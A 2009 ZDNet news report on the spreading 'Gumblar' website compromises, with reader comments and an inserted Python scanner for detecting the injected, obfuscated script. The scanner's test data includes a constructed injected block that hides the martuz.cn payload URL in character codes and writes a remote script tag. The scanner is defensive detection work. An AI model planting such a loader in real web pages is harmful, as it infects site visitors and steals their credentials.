
'Gumblar' web attacks spreading quickly

Matthew Broersma ZDNet.co.uk | May 19, 2009 4:43 AM PDT

Summary

The attackers behind a series of rapidly spreading website compromises have begun using a new domain to deliver their malicious code.
The attackers behind a series of rapidly spreading website compromises have begun using a new domain to deliver their malicious code, security experts said on Monday.

The attacks, collectively referred to as 'Gumblar' by ScanSafe and 'Troj/JSRedir-R' by Sophos, grew 188 percent over the course of a week, ScanSafe said on Thursday. The Gumblar infections accounted for 42 percent of all infections found on websites last week, Sophos said on Thursday.

Over the weekend, the Chinese web domain used to deliver the malicious code — gumblar.cn — stopped responding, according to Unmask Parasites, a service used to detect malicious code embedded in web pages. The attacks' malicious payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said in an advisory published on Monday.

"They have slightly modified the script and now inject a new version that loads malicious content from a new domain," Unmask Parasites said in the advisory.

Changes to the script make it more difficult to identify and are intended to prevent detection by the Google Chrome browser, Unmask Parasites said.

Gumblar was first detected in March and has spread more and more quickly since then, against the expectations of security experts.

"A typical series of website compromises reaches peak within the first week or so and subsequently begins declining in intensity as detection is added by signature vendors, user awareness increases and website operators begin cleaning the affected sites," said ScanSafe senior security researcher Mary Landesman, in an advisory published on Thursday.

In the Gumblar attacks, the opposite is occurring, partly because website administrators themselves are affected by the attacks as they try to address the problem, ScanSafe said.

Sites affected include Tennis.com, Variety.com and Coldwellbanker.com, according to ScanSafe.

The attacks were carried out in multiple stages, beginning in March, when a number of websites were compromised and attack code embedded within them, ScanSafe said.

Then, in early May, as website operators began to clean up their sites, the attackers replaced the original malicious code with dynamically generated and heavily obfuscated JavaScript, meaning that the scripts change from page to page and are difficult for security tools to spot.

The scripts attempt to exploit vulnerabilities in Adobe's Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer, ScanSafe said.

They also search the victim's system for FTP credentials that can be used to compromise further websites, the firm said.

The malicious code embedded on a user's system was previously downloaded from gumblar.cn, a Chinese domain associated with Russian and Latvian IP addresses, delivering code from servers based in the UK, according to ScanSafe. That domain has now changed to martuz.cn.
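The paragraphs above give a website operator two things to look for: the payload domains (gumblar.cn, then martuz.cn) and injected script that is dynamically generated and obfuscated so that it differs from page to page, which is exactly what defeats a fixed signature. The scanner below is an added example and is not ScanSafe's, Sophos's or Unmask Parasites' tooling. It decodes the two commonest literal encodings used to hide strings in injected script (String.fromCharCode(...) and unescape('...')) before matching the domains, and flags blocks by their structure rather than by exact bytes. The two sample pages, the injected block inside them, the token list and the thresholds are constructed for this example; the injected block is illustrative and is not the script the attackers actually used.

```python
"""Scan HTML for injected, obfuscated <script> blocks that pull a payload from
the domains named in the article. Added example, not vendor tooling; the
thresholds and token list are assumptions."""
import re
from urllib.parse import unquote

# Payload domains named in the article.
KNOWN_DOMAINS = ("gumblar.cn", "martuz.cn")

# Constructs injected script leans on to assemble its payload at runtime (assumed list).
OBFUSCATION_TOKENS = ("eval(", "unescape(", "String.fromCharCode", "document.write(", ".replace(")
MIN_TOKENS = 2           # this many in one block is rare in hand-written page script
MIN_ENCODED_CHARS = 16   # a packed payload is longer than a couple of escaped characters

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)")
UNESCAPE_RE = re.compile(r"""unescape\s*\(\s*(['"])(.*?)\1\s*\)""")
PERCENT_RE = re.compile(r"%[0-9a-fA-F]{2}")


def deobfuscate(script: str) -> str:
    """Replace literal String.fromCharCode(...) and unescape('...') calls with the text
    they produce, so a domain hidden as character codes or %XX escapes can be matched.
    Only static literals are decoded; this is not a JavaScript interpreter."""
    def _codes(m):
        out = []
        for tok in m.group(1).split(","):
            tok = tok.strip()
            if tok and int(tok) < 0x110000:
                out.append(chr(int(tok)))
        return "".join(out)

    def _unesc(m):
        return unquote(m.group(2))

    return UNESCAPE_RE.sub(_unesc, FROMCHARCODE_RE.sub(_codes, script))


def encoded_char_count(script: str) -> int:
    """Number of characters carried as numeric codes or %XX escapes."""
    codes = sum(len([t for t in m.split(",") if t.strip()]) for m in FROMCHARCODE_RE.findall(script))
    return codes + len(PERCENT_RE.findall(script))


def analyse_script(attrs: str, body: str) -> dict:
    """Score one <script> element; 'reasons' is empty for a benign block."""
    src_match = SRC_RE.search(attrs)
    src = src_match.group(1) if src_match else ""
    haystack = (src + " " + deobfuscate(body)).lower()
    domains = [d for d in KNOWN_DOMAINS if d in haystack]
    tokens = [t for t in OBFUSCATION_TOKENS if t in body]
    encoded = encoded_char_count(body)

    reasons = []
    if domains:
        reasons.append("loads from known payload domain(s): " + ", ".join(domains))
    if len(tokens) >= MIN_TOKENS:
        reasons.append("runtime string-building constructs: " + ", ".join(tokens))
    if encoded >= MIN_ENCODED_CHARS:
        reasons.append(f"{encoded} characters carried as numeric codes or %XX escapes")
    return {"src": src or None, "domains": domains, "reasons": reasons, "suspicious": bool(reasons)}


def scan_html(html: str) -> list:
    """Findings for every <script> element in one HTML document."""
    return [analyse_script(attrs, body) for attrs, body in SCRIPT_RE.findall(html)]


# Constructed samples: a benign page, and the same page with a hypothetical injected
# block appended. The injected block is illustrative, not the attackers' real script.
CLEAN_PAGE = """<html><head>
<script src="/js/jquery.js"></script>
<script>
function toggle(id) {
  var e = document.getElementById(id);
  e.style.display = (e.style.display == 'none') ? '' : 'none';
}
</script>
</head><body><p>Hello</p></body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """<script>var u=String.fromCharCode(104,116,116,112,58,47,47,109,97,114,116,117,122,46,99,110,47);
document.write(unescape('%3Cscript src=')+u+unescape('%3E%3C/script%3E'));</script></body>""")


if __name__ == "__main__":
    for page_name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for i, f in enumerate(scan_html(page)):
            status = "SUSPICIOUS" if f["suspicious"] else "ok"
            print(f"{page_name} script#{i} src={f['src']}: {status} {'; '.join(f['reasons'])}")
```

Run it over files pulled from the web server, and do so from a machine you trust: the article notes that administrators were being infected while cleaning up, and the malware harvests FTP credentials, so a compromised workstation used for cleanup hands the attackers what they need to reinfect the site. The structural heuristics will also fire on legitimately minified or packed libraries, so treat a hit without a domain match as something to review rather than a verdict.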

This article was first posted on ZDNet UK.

Talkback (24 comments)

  • RE: 'Gumblar' web attacks spreading quickly
    "The scripts attempt to exploit vulnerabilities in Adobe's Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer..."

    Sorry Windows guys, but really, Internet Explorer AGAIN! Please get people to use Firefox!

    Phil S.
    Serenicom
    19th May 2009
  • Not another My browser is better than yours post...
    I use Firefox, IE, and Chrome, depending on the
    tasks best suited to them. Does this mean I am 3
    times more exposed, 2 thirds less exposed, or just
    mathematically challenged?
    cneale@...
    19th May 2009
  • lol
    LiLac22281
    21st May 2009
  • Not really....this is not so much about browsers
    Recent reports have shown that the automatic update feature of FF allows fixes to be applied quickly to a large percentage of FF users, making any attempt to utilize any of the bugs you highlighted a complete waste of time. These bugs are already fixed for the vast majority of persons using FF, and almost everyone will be using the latest version, 3.0.10.

    In any case, this attack is actually targeting the Adobe Reader and the Flash player plug-in that IE users are using (an ActiveX plug-in), not browser vulnerabilities present in IE. When the victim visits an infected site, they get redirected to the Gumblar website which then pushes an infected PDF onto the PC as well as attempts to use a Flash exploit. Once on the PC, the malware disables things like regedit, antivirus software and cmd, looks for FTP client passwords, and redirects your Google searches to sites that usually also push malware. It's unclear to me if the latest version of Adobe Reader is vulnerable - I'm seeing conflicting reports online. Turning off JavaScript in Adobe Reader until the problem is solved is probably wise. Updating Flash to the latest version 10 is also necessary. FF users can further protect their PCs with NoScript.
    eMJayy
    19th May 2009
  • Secunia PSI ...
    can also help keep your apps up to date. I've been hit with one of these attacks and because my Adobe was updated, NOD32 was able to kick butt within seconds after three attacks in a row!

    Using host file blockers like the FireFox plugin Adblock Plus, Spyware Blaster, and AdAware's Adwatch can go a long way toward mitigating these threats also. Getting auto updates is even a better idea.

    My clients refuse to use NoScript, and they refuse to block iFrames and Java. And why should they? Why give in to the "terrorists"?

    I run the minefields so I can find out how to deal with the dangers; it is a good education in the war with malware.
    JCitizen
    20th May 2009
  • Why weep...
    Those exploits are fixed within a matter of hours.

    IE (and its HACtiveX hole) might be updated the next Tuesday of the next month if you're lucky.
    Wintel BSOD
    20th May 2009
  • Read again!
    It's not just IE that has issues with this exploit:

    "Changes to the script make it more difficult to identify and stop detection by the Google Chrome browser, Unmask Parasites said."
    Parassassin
    20th May 2009
  • FireFox
    Why would I want to use FireFox? It was ONCE a good option and the better browser but not anymore. I've actually stopped using it in favour of other browsers.

    Instead of moaning about browsers and cussing IE why not instead have a go at Adobe for releasing products that are the cause of so many of these flaws?

    Yes it attacks IE but THROUGH Flash. So surely why not just say to people don't install ActiveX or Reader as this will make your system far more secure.
    Average-IT-Guy
    20th May 2009
  • Unless you need web functionality...
    why give in to the "terrorists"? There are many freeware tools out there that block these threats.

    Many of them work in tandem and don't interfere with modern AV solutions.

    Just read the user reviews at CNET (download.com)
    JCitizen
    20th May 2009
  • Why I use Firefox
    I use Firefox on both Linux and Windows. I have Adblock Plus and Flashblock installed, so Flash only runs if I want it to, hence no sneak attacks.

    I also do not use the Adobe Reader for PDF files, I use Foxit! Reader in Windows, and the built-in PDF reader in Ubuntu. Once again, no problems, they don't run JavaScript, et al.

    It's not perfect, nothing is, but with this combo in Linux, it is about as secure as I can get, and when I have to run Windows, it also works pretty well when used with a little common sense.

    Phil S.
    Serenicom
    24th May 2009
  • Last time I attempted to use Foxit..
    Secunia PSI reported it as insecure. Perhaps the Linux version is okay, however.
    JCitizen
    25th May 2009
  • Adobe update.
    I have Flash and Acrobat Reader updated. Am I safe or not?
    magallanes
    20th May 2009
  • You still need AV and AS solutions as well..
    By keeping those updated the likelihood that the bugs could take administrative control is reduced significantly.

    But you would have to be running as a restricted user, to help with this, to mitigate the threat.

    CNET (download.com) has many good freeware solutions reviewed by users, that you could download to help fight such attacks, both on the administrative and restricted side of your PC accounts.
    JCitizen
    25th May 2009
  • RE: Add ons aren't the solution
    A solution that requires someone to pore over web reviews at download.com to keep their browser safe is a non answer.

    Business just wants things to work.

    It's why Flash and Adobe caught on - it just works, and it works the same no matter what browser.

    Everyone rants on IE, and it deserves a share of this, but as others pointed out, so does Adobe, in spades.

    == John ==
    jgwinner
    20th May 2009
